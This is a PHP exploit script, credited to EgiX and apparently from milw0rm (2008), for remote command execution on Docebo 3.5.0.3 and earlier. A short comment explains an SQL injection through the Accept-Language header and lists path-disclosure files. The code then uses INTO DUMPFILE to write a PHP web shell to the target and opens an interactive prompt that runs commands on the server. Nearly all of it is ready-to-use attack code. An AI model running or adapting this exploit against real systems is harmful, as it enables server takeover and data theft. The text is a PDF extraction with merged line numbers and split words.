1 <? 2 3 /* 4 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 5 Docebo <= 3.5.0.3 (lib.regset.php) Remote Command Execution Exploit 6 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 7 8 author...: EgiX 9 mail.....: n0b0d13s[at]gmail[dot]com 10 11 link.....: http://www.docebo.org/ 12 details..: works with magic_quotes_gpc = off (if magic quotes affects also $_SERVER[] array) 13 14 [−] autoDetectRegion() function vulnerable to SQL injection in /doceboCore/lib/lib.regset.php 15 16 781. function autoDetectRegion() { 17 782. 18 783. if(!isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])) { 19 784. $res=0; 20 785. return $res; 21 786. } 22 787. $accept_language=$_SERVER["HTTP_ACCEPT_LANGUAGE"]; 23 788. // [TODO] move the code that makes the accept language array to lib.utils 24 789. 25 790. $al_arr=explode(",", $accept_language); 26 791. 27 792. $i=0; 28 793. $res=""; 29 794. while(($res == "") && ($i < count($al_arr))) { 30 795. 31 796. $bl_arr=explode(";", $al_arr[$i]); 32 797. $browser_language=$bl_arr[0]; 33 798. 34 799. $qtxt="SELECT region_id FROM ".$this−>_getListTable()." WHERE browsercode LIKE ’%".$b rowser_language."%’"; <== 35 800. $q=$this−>_executeQuery($qtxt); 36 801. 37 802. if (($q) && (mysql_num_rows($q) > 0)) { 38 803. $row=mysql_fetch_array($q); 39 804. $res=$row["region_id"]; 40 805. } 41 42 an attacker cuold be inject SQL code through http accept−language header (in the query at line 799), but expl ode() function at 43 line 790 will split the injected code by comma (","), so isn’t possible even a blind SQL injection with BENCH MARK() method... 44 this poc will try to inject some php code into docebo web directory by INTO DUMPFILE statement, this requires FILE privilege! 
45 46 [−] Path disclosure at: 47 48 /doceboCore/class/class.conf_fw.php Page 1/3 Docebo 3.5.0.3 lib.regset.php Command Execution Exploit EgiX 01/09/2008 49 /doceboCore/class.module/class.event_manager.php 50 /doceboCore/lib/lib.domxml5.php 51 /doceboCore/menu/menu_over.php 52 /doceboCms/class/class.conf_cms.php 53 /doceboCms/lib/lib.compose.php 54 /doceboCms/modules/chat/teleskill.php 55 /doceboCms/class/class.admin_menu_cms.php 56 */ 57 58 error_reporting(0); 59 set_time_limit(0); 60 ini_set("default_socket_timeout", 5); 61 62 function http_send($host, $packet) 63 { 64 $sock = fsockopen($host, 80); 65 while (!$sock) 66 { 67 print "\n[−] No response from {$host}:80 Trying again...\n"; 68 $sock = fsockopen($host, 80); 69 } 70 fputs($sock, $packet); 71 while (!feof($sock)) $resp .= fread($sock, 1); 72 fclose($sock); 73 return $resp; 74 } 75 76 function get_path() 77 { 78 global $host, $path; 79 80 $packet = "GET {$path}../doceboCore/class/class.conf_fw.php HTTP/1.0\r\n"; 81 $packet.= "Host: {$host}\r\n"; 82 $packet.= "Connection: close\r\n\r\n"; 83 84 preg_match("/in <b>(.*)<\/b> on/i", http_send($host, $packet), $found); 85 $ret = substr($found[1], 0, strlen($found[1]) − strlen(strstr($found[1], "docebo"))); 86 $ret.= substr($path, 1); 87 88 return $ret; 89 } 90 91 print "\n+−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+"; 92 print "\n| Docebo <= 3.5.0.3 Remote Command Execution Exploit by EgiX |"; 93 print "\n+−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+\n"; 94 95 if ($argc < 3) 96 { 97 print "\nUsage....: php $argv[0] host path\n"; 98 print "\nhost.....: target server (ip/hostname)"; 99 print "\npath.....: path to docebo directory\n"; 100 print "\nExample..: php $argv[0] localhost /doceboCms/"; Page 2/3 Docebo 3.5.0.3 lib.regset.php Command Execution Exploit EgiX 01/09/2008 101 print "\nExample..: php $argv[0] localhost /docebo/doceboLms/\n"; 102 die(); 103 } 104 105 $host = $argv[1]; 106 $path = $argv[2]; 107 108 $r_path = 
str_replace("\\", "/", get_path()); // replace "\" for windows path 109 $r_file = md5(time()).".php"; 110 111 print "\n[−] Path disclosure: {$r_path}\n\n[−] Trying to inject php shell...\n"; 112 113 $code = "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>"; 114 $packet = "GET {$path} HTTP/1.0\r\n"; 115 $packet.= "Host: {$host}\r\n"; 116 $packet.= "Accept−Language: %’/**/AND/**/1=0/**/UNION/**/SELECT/**/’{$code}’/**/INTO/**/DUMPFILE/**/’{$r_path}{$r_file}’/*\r\n"; 117 $packet.= "Connection: close\r\n\r\n"; 118 $html = http_send($host, $packet); 119 120 $packet = "GET {$path}{$r_file} HTTP/1.0\r\n"; 121 $packet.= "Host: {$host}\r\n"; 122 $packet.= "Connection: close\r\n\r\n"; 123 $html = http_send($host, $packet); 124 125 if (!ereg("_code_", $html)) die("\n[−] Exploit failed...\n"); 126 else print "[−] Shell injected! Starting it...\n"; 127 128 define(STDIN, fopen("php://stdin", "r")); 129 while(1) 130 { 131 print "\nxpl0it−sh3ll > "; 132 $cmd = trim(fgets(STDIN)); 133 if ($cmd != "exit") 134 { 135 $packet = "GET {$path}{$r_file} HTTP/1.0\r\n"; 136 $packet .= "Host: {$host}\r\n"; 137 $packet .= "Cmd: ".base64_encode($cmd)."\r\n"; 138 $packet .= "Connection: close\r\n\r\n"; 139 $html = http_send($host, $packet); 140 if (!ereg("_code_", $html)) die("\n[−] Exploit failed...\n"); 141 $shell = explode("_code_", $html); 142 print "\n".$shell[1]; 143 } 144 else break; 145 } 146 147 ?> 148 149 # milw0rm.com [2008−01−09] Page 3/3 Docebo 3.5.0.3 lib.regset.php Command Execution Exploit EgiX 01/09/2008